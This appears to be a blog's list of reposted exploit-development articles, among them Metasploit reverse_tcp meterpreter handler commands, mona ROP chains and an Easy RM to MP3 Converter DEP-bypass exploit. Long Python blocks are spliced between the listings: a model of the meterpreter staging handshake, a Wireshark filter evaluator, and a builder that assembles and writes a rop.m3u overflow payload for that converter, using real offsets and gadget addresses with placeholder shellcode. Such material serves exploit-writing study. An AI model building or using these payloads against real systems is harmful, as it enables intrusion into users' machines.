[Repost] Export content to a file
int LogToFile(char* pFilePath, WORD* pBuffer)
{
    int nRetCode = 0;
    FILE* pFile;
    pFile = fopen(pFilePath, "a+");
    if (NULL == pFile) {
        printf("Fail to open file!\n");
        ...
2015-05-30 20:54:41, 359 views
[Repost] ReadProcessMemory and WriteProcessMemory usage analysis (repost)
http://blog.csdn.net/shifters/article/details/6750353
2015-05-30 15:15:23, 565 views
[Repost] Connecting a stage shellcode back to meterpreter
1. Run the stage1 shellcode on the compromised host. 2. Start the Metasploit Framework on Kali. 3. Run the following commands: msf > use multi/handler; msf exploit(handler) > set payload windows/meterpreter/reverse_tcp; payload => windows/meterpreter/revers...
2015-05-12 23:17:09, 724 views
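The three steps above only work in that order because the stage1 shellcode is a stager: it connects back to the handler, reads a 4-byte little-endian length, reads that many bytes of stage, and executes them. As an added example, not code from the reposted post or from Metasploit, the exchange below models both ends of that handshake in Python over a socketpair (standing in for the TCP connect-back to LHOST:LPORT). The wire format is an assumption modelled on reverse_tcp, and the stage bytes are constructed.

```python
import socket
import struct
import threading

# Constructed stand-in for the stage: in reality the handler sends the
# meterpreter server DLL; any opaque blob works for the exchange itself.
STAGE = b"\x90" * 16 + b"CONSTRUCTED-STAGE-BYTES"


def recvall(sock, n):
    """Read exactly n bytes; raise if the peer hangs up early."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("closed after %d of %d bytes" % (len(buf), n))
        buf.extend(chunk)
    return bytes(buf)


def handler_send_stage(sock, stage):
    """multi/handler side: the stager has connected back, so push the stage
    prefixed with its little-endian 32-bit length (assumed wire format)."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)


def stager_receive(sock):
    """stage1 side: read the 4-byte length, then exactly that many bytes.
    A real stager would then jump into the buffer; here it is returned."""
    (length,) = struct.unpack("<I", recvall(sock, 4))
    return recvall(sock, length)


def run_staging_demo(stage=STAGE):
    """Run both ends and return what the stager ended up holding."""
    handler_end, stager_end = socket.socketpair()
    with handler_end, stager_end:
        t = threading.Thread(target=handler_send_stage, args=(handler_end, stage))
        t.start()
        received = stager_receive(stager_end)
        t.join()
    return received


def run_truncated_demo():
    """Failure mode: the handler advertises 64 bytes but sends 16 and closes.
    The stager must refuse the short buffer instead of executing it.
    Returns True when the short read was detected."""
    handler_end, stager_end = socket.socketpair()
    with handler_end, stager_end:
        handler_end.sendall(struct.pack("<I", 64) + b"\x90" * 16)
        handler_end.shutdown(socket.SHUT_WR)
        try:
            stager_receive(stager_end)
        except ConnectionError:
            return True
    return False


if __name__ == "__main__":
    got = run_staging_demo()
    print("stager received %d bytes, matches stage: %s" % (len(got), got == STAGE))
    print("truncated stage detected:", run_truncated_demo())
```

If the stager runs before the handler is listening, the connect simply fails and nothing is staged, which is why step 1 on the target comes last in practice even though it is listed first.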
[Repost] Practical Wireshark filter expressions (for IP, protocol, port, length and content)
First, a few of the most common keywords: "eq" and "==" are equivalent; "and" expresses conjunction and "or" disjunction; "!" and "not" both negate. 1. The most common Wireshark filters are naturally those on IP addresses. There are several cases: (1) Filtering packets whose source address is 192.168.0.1, i.e. capturing only packets whose source address matches. The expression is: ip.src == 192.168.0.1 (...
2015-05-11 21:45:09, 351 views
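The keyword rules above (eq/==, and, or, !/not, plus parentheses and the usual "and binds tighter than or" precedence) are easiest to pin down by evaluating them. The following is an added example, not code from the reposted article or from Wireshark: a small display-filter evaluator run over constructed packet records. Field names follow Wireshark's (ip.src, ip.addr, tcp.port, frame.len); the packet contents, the presence test for bare protocol names, and the "!= is true only when every occurrence differs" semantics are assumptions.

```python
import re

# Tokens: parentheses, two-character operators, single-character operators,
# quoted strings, and bare words (field names, addresses, numbers).
TOKEN_RE = re.compile(r'\(|\)|==|!=|>=|<=|&&|\|\||[<>!]|"[^"]*"|[^\s()=!<>&|"]+')

# Wireshark spells every comparison two ways; map both to one canonical name.
CMP = {"==": "eq", "eq": "eq", "!=": "ne", "ne": "ne", ">": "gt", "gt": "gt",
       "<": "lt", "lt": "lt", ">=": "ge", "ge": "ge", "<=": "le", "le": "le",
       "contains": "contains"}


def _coerce(v):
    """Numbers compare numerically ("80", "0x50"); anything else as a string."""
    try:
        return int(v, 0)
    except (ValueError, TypeError):
        return v


def _compare(op, actual, wanted):
    if op == "contains":
        return str(wanted) in str(actual)
    a, w = _coerce(actual), _coerce(wanted)
    if type(a) is not type(w):          # int vs str: fall back to text compare
        a, w = str(a), str(w)
    return {"eq": a == w, "ne": a != w, "gt": a > w,
            "lt": a < w, "ge": a >= w, "le": a <= w}[op]


class DisplayFilter:
    """Recursive-descent parser; precedence from loosest to tightest: or, and, not."""

    def __init__(self, text):
        self.toks = TOKEN_RE.findall(text)
        self.pos = 0
        self.ast = self._or()
        if self.pos != len(self.toks):
            raise SyntaxError("trailing tokens: %r" % self.toks[self.pos:])

    def _peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else None

    def _next(self):
        tok = self._peek()
        self.pos += 1
        return tok

    def _or(self):
        node = self._and()
        while self._peek() in ("or", "||"):
            self._next()
            node = ("or", node, self._and())
        return node

    def _and(self):
        node = self._not()
        while self._peek() in ("and", "&&"):
            self._next()
            node = ("and", node, self._not())
        return node

    def _not(self):
        if self._peek() in ("not", "!"):
            self._next()
            return ("not", self._not())
        return self._primary()

    def _primary(self):
        tok = self._next()
        if tok is None:
            raise SyntaxError("unexpected end of filter")
        if tok == "(":
            node = self._or()
            if self._next() != ")":
                raise SyntaxError("missing ')'")
            return node
        if self._peek() in CMP:                       # field <op> value
            op = CMP[self._next()]
            val = self._next()
            if val is None:
                raise SyntaxError("missing value after %s" % op)
            return ("cmp", tok, op, val.strip('"'))
        return ("has", tok)                            # bare field/protocol: presence test

    def matches(self, pkt):
        return self._eval(self.ast, pkt)

    def _eval(self, node, pkt):
        kind = node[0]
        if kind == "or":
            return self._eval(node[1], pkt) or self._eval(node[2], pkt)
        if kind == "and":
            return self._eval(node[1], pkt) and self._eval(node[2], pkt)
        if kind == "not":
            return not self._eval(node[1], pkt)
        if kind == "has":
            return node[1] in pkt
        _, field, op, wanted = node
        if field not in pkt:
            return False
        values = pkt[field] if isinstance(pkt[field], tuple) else (pkt[field],)
        if op == "ne":   # != holds only if every occurrence of the field differs
            return all(_compare("ne", v, wanted) for v in values)
        return any(_compare(op, v, wanted) for v in values)


# Constructed sample "packets": the dissected fields a real capture would carry.
# Fields such as ip.addr and tcp.port occur twice per packet, hence the tuples.
PACKETS = [
    {"frame.number": 1, "frame.len": 74, "tcp": True,
     "ip.src": "192.168.0.1", "ip.dst": "10.0.0.5", "ip.addr": ("192.168.0.1", "10.0.0.5"),
     "tcp.srcport": 54321, "tcp.dstport": 80, "tcp.port": (54321, 80),
     "http.request.uri": "/login"},
    {"frame.number": 2, "frame.len": 1514, "tcp": True,
     "ip.src": "10.0.0.5", "ip.dst": "192.168.0.1", "ip.addr": ("10.0.0.5", "192.168.0.1"),
     "tcp.srcport": 80, "tcp.dstport": 54321, "tcp.port": (80, 54321)},
    {"frame.number": 3, "frame.len": 78, "udp": True, "dns": True,
     "ip.src": "192.168.0.2", "ip.dst": "8.8.8.8", "ip.addr": ("192.168.0.2", "8.8.8.8"),
     "udp.srcport": 40001, "udp.dstport": 53, "udp.port": (40001, 53),
     "dns.qry.name": "example.com"},
]


def apply_filter(text, packets=PACKETS):
    """Return the frame numbers that match, like Wireshark's packet list."""
    flt = DisplayFilter(text)
    return [p["frame.number"] for p in packets if flt.matches(p)]
```

Note the difference between ip.src == 192.168.0.1 (one direction) and ip.addr == 192.168.0.1 (both directions, because ip.addr carries both addresses); the same applies to tcp.port versus tcp.srcport/tcp.dstport.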
[Repost] Writing Immunity Debugger plugins
__VERSION__ = '2.0'
__REV__ = filter(str.isdigit, '$Revision: 557 $')
__IMM__ = '1.8'
__DEBUGGERAPP__ = ''
arch = 32
win7mode = False
# try:
#     import debugger
# except:
#     pass
try:
...
2015-05-05 22:24:02, 947 views
[Repost] Tutorial on writing Immunity Debugger plugins
https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/
2015-05-04 21:43:42, 2037 views
[Repost] Exploiting an array out-of-bounds overflow, part 2: overwriting the length field of a preceding string with a large value
http://bbs.pediy.com/archive/index.php?t-155555.html Using this array out-of-bounds vulnerability, overwrite the length field of a string located in front of the option cache with a large value. Since the length is no longer constrained, reading that string now returns all of the data that follows it in memory. With that primitive, first determine the exact virtual address at which the string lives; then, using that address together with the arbitrary memory read, obtain the base address of the option array mentioned above...
2015-05-03 23:05:51, 450 views
[Repost] How to use rop_gadgets
The chain can be generated with mona.py: !mona rop -m msvcr71.dll -n. This gadget chain sets up a VirtualProtect call that marks the memory holding the shellcode that follows it executable, so the shellcode can simply be appended after the chain. rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX...
2015-05-02 15:11:19, 2005 views
[Repost] Universal DEP/ASLR bypass with msvcr71.dll and mona.py
Reposted from: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ Introduction: Over the last few weeks, there has been some commotion about a universal...
2015-05-01 22:51:49, 630 views
[Repost] Bypassing DEP with an egg hunter
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
#-------------------------------------------------------------------
#corelanc0...
2015-05-01 21:30:40, 721 views
[Repost] ROP DEP-bypass exploit for Easy RM to MP3 Converter, adapted to the Chinese-language version
#------------------------------------------------------------
#ROP based exploit for Easy RM to MP3 Converter
#written by corelanc0d3r - http://www.corelan.be
#-------------------------------------...
2015-05-01 16:46:45, 891 views
[Repost] Code for testing ROP on Easy RM to MP3 Converter
my $file="rop.m3u";
my $buffersize=26094-20-8-4;
my $junk="A"x$buffersize;
my $eip=pack('V',0x100102DC); #pointer to ret
my $junk2="AAAA"; #compensate, to make sure esp points at first rop gadget
my ...
2015-05-01 10:14:43, 421 views
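The three Easy RM entries above (the mona-generated rop_gadgets list, the corelanc0d3r ROP exploit, and the Perl skeleton with $junk, $eip and $junk2) all share one payload layout: junk up to the saved return address, a pointer to RETN, compensation bytes, the ROP chain, then the shellcode the chain makes executable. As an added example, not code from the page or from corelan, here is that layout assembled and checked in Python. It reuses the offsets and the two gadget addresses quoted above; the third gadget, the shellcode and the bad-byte set are constructed placeholders and are labelled as such.

```python
import struct

# Layout constants quoted on the page (Easy RM to MP3 Converter, .m3u input).
OFFSET_TO_EIP = 26094 - 20 - 8 - 4   # $buffersize: junk before the saved return address
PTR_TO_RETN = 0x100102DC             # $eip: pointer to a RETN, pivots execution into the chain
COMPENSATION = b"AAAA"               # $junk2: consumed before ESP reaches the first gadget

# Gadgets in the (address, comment) form mona prints. The first two are the
# ones quoted on the page; the third is a constructed placeholder for the
# rest of mona's msvcr71.dll chain, not a real gadget from the article.
GADGETS = [
    (0x7c346c0a, "POP EAX # RETN (MSVCR71.dll)"),
    (0x7c37a140, "Make EAX (rest of the comment is truncated in the page excerpt)"),
    (0x7c34d201, "constructed placeholder for the remaining chain entries"),
]

# NUL terminates the string the player reads; other bad bytes are target-specific.
DEFAULT_BADCHARS = b"\x00"


def pack_chain(gadgets):
    """Serialise gadget addresses as little-endian dwords, like pack('V', ...) in Perl."""
    return b"".join(struct.pack("<I", addr) for addr, _ in gadgets)


def find_bad_chars(blob, badchars=DEFAULT_BADCHARS):
    """(offset, byte) pairs within blob that the target would mangle or truncate on."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def build_payload(gadgets=GADGETS, shellcode=b"\xcc" * 4, nops=16,
                  offset=OFFSET_TO_EIP, eip=PTR_TO_RETN, compensation=COMPENSATION):
    """Assemble junk | EIP | junk2 | ROP chain | NOPs | shellcode and report the
    file offset where each region starts. The default shellcode is a
    constructed INT3 placeholder, not a real payload."""
    regions = [
        ("junk", b"A" * offset),
        ("eip", struct.pack("<I", eip)),
        ("junk2", compensation),
        ("rop", pack_chain(gadgets)),
        ("nops", b"\x90" * nops),
        ("shellcode", shellcode),
    ]
    offsets, pos = {}, 0
    for name, blob in regions:
        offsets[name] = pos
        pos += len(blob)
    return b"".join(blob for _, blob in regions), offsets


def check_payload(payload, offsets, eip=PTR_TO_RETN, gadgets=GADGETS,
                  badchars=DEFAULT_BADCHARS):
    """Pre-flight checks before loading the file in the debugger.
    Returns a list of problem strings; empty means ready to test."""
    problems = []
    # Everything from the saved EIP onward has to survive the parser intact.
    for i, b in find_bad_chars(payload[offsets["eip"]:], badchars):
        problems.append("bad byte 0x%02x at file offset %d" % (b, offsets["eip"] + i))
    # Decode the dwords back: a wrong pack format ('N' instead of 'V') shows up here.
    (eip_in_file,) = struct.unpack("<I", payload[offsets["eip"]:offsets["eip"] + 4])
    if eip_in_file != eip:
        problems.append("saved EIP holds 0x%08x, expected 0x%08x" % (eip_in_file, eip))
    for i, (addr, _) in enumerate(gadgets):
        at = offsets["rop"] + 4 * i
        (in_file,) = struct.unpack("<I", payload[at:at + 4])
        if in_file != addr:
            problems.append("gadget %d at offset %d holds 0x%08x, expected 0x%08x"
                            % (i, at, in_file, addr))
    return problems


def describe(payload, offsets, gadgets=GADGETS):
    """Annotate the chain the way mona's listing does, with absolute file
    offsets, so each dword can be matched against the debugger's stack view."""
    lines = []
    for i, (_, comment) in enumerate(gadgets):
        at = offsets["rop"] + 4 * i
        (dword,) = struct.unpack("<I", payload[at:at + 4])
        lines.append("%6d  0x%08x  # %s" % (at, dword, comment))
    return lines


def write_m3u(path, payload):
    with open(path, "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    payload, offsets = build_payload()
    print("\n".join(describe(payload, offsets)))
    print("problems:", check_payload(payload, offsets) or "none")
    write_m3u("rop.m3u", payload)
```

Running check_payload with the bad-byte set widened to include 0x0a and 0x0d is the quick way to see whether a chain mona emitted for one target can be reused in a file format that is parsed line by line: here the first quoted gadget (0x7c346c0a) would be flagged.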